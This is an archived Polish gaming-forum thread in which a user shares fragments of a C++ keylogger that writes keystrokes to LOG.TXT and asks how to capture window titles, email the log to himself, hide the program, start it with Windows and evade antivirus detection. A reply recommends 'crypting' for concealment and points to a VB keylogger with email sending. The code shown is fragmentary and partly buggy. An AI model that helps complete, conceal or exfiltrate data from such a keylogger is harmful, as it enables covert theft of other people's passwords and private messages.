Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Keylogger w C++

teusz0724k

Rekomendowane odpowiedzi

Opublikowano

Witam, stworzyłem Keyloggera, działać działa..., dodałem pisanie Z DUŻYCH LITER oraz z małych, ale w LOG.txt mam coś takiego:

wpisałem dla przykładu: qwerty Qwerty to w LOG.TXT pojawiło się takie coś: QWERTY [sHIFT] [sHIFT]  [bACKSPACE] QWERTY

Zapewne coś jest źle czy tak ma być? Chciałbym żeby było pisane normalne 'a' a gdy wciśnie Shift wtedy 'A'. Oczywiście dodam kod który wskazuje na ten rodzaj pisania:

fclose(OUTPUT_FILE);
cout << key_stronke << 1;
}else{
if(key_stronke == 16 || key_stronke == 8) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [BACKSPACE]");
else if(key_stronke == 16 || key_stronke == 32) fprintf(OUTPUT_FILE, "%s", "[SHIFT] ");
else if(key_stronke == 16 || key_stronke == 18) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [ALT]");
else if(key_stronke == 16 || key_stronke == 91) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [WINDOWS]");
else if(key_stronke == 16 || key_stronke == 17) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [CONTROL]");
else if(key_stronke == 16) fprintf(OUTPUT_FILE, "%s", " [SHIFT] ");
else if(key_stronke == 16 || key_stronke == 20) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [CAPS LOCK]");
else if(key_stronke == 16 || key_stronke == 9 ) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [TAB]");
else if(key_stronke == 16 || key_stronke == 13) fprintf(OUTPUT_FILE, "%s", "\n");
else if(key_stronke == 16 || key_stronke == 36) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [HOME]");
else if(key_stronke == 16 || key_stronke == 35) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [END]");
else if(key_stronke == 16 || key_stronke == 46) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [DELETE]");
else if(key_stronke == 16 || key_stronke == 33) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [PAGE UP]");
else if(key_stronke == 16 || key_stronke == 45) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [INSERT]");
else if(key_stronke == 16 || key_stronke == 34) fprintf(OUTPUT_FILE, "%s", "[SHIFT] [PAGE DOWN]");

else fprintf(OUTPUT_FILE, "%s", &key_stronke);

fclose(OUTPUT_FILE);
cout << key_stronke << 1;
}
return 0;

Dobra, teraz druga sprawa, chce żeby było pokazywane gdzie ktoś wszedł np. [Facebook] czy normalnie Facebook, znalazłem tutaj kod który za to odpowiada:

HWND hWindow = GetForegroundWindow();
int textLength = GetWindowTextLengthA(hWnd) + 1;
char text[textLength];
GetWindowTextA(hWnd, text, textLength);

Lecz po wpisaniu go wywala Errory, jeśliby ktoś umiał pomóc.. 

Kolejną sprawą chciałbym aby Keylogger przesyłał do mnie plik LOG.TXT < nie ma znaczenia czy na e-maila czy na kompa> tylko teraz pytanie czy da się jakoś w C++ czy musiał bym Client/Server? 

Ostatnią sprawą jest niewykrywanie przez antywirusy i ogólne ukrycie aplikacji, lecz na to kodu niestety nie znam i nie mogłem poszukać. 

tumblr_me3px1cAsX1rll4sdo1_500.gif                                                             

Opublikowano

Co do ukrycia do polecam zainteresowanie się cryptowaniem/szukaniem na goglach.Co do wysyłania to na yt jest keylogger w VB i tam jest wysyłanie na e-mail,zapewne nie wiele się różni napisanie tego w C++

Opublikowano

Ok jak bede miał czas to oczywiscie poszukam, a narazie napisałem 2 typy schowania programu w tle tylko nie wiem czy dobrze, żeby nie było że chce gotowca, daje do sprawdzenia: 

xxx

A z tym keyloggerem z e-mailem na VB mógłbyś dać link?

Oczywiście co zrobić z tym sprawdzaniem Caps oraz Shift? 

No i jeszcze poszukuje podpowiedzi / tuta / video jak zrobić uruchamianie programu z startem Windowsa

tumblr_me3px1cAsX1rll4sdo1_500.gif                                                             

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...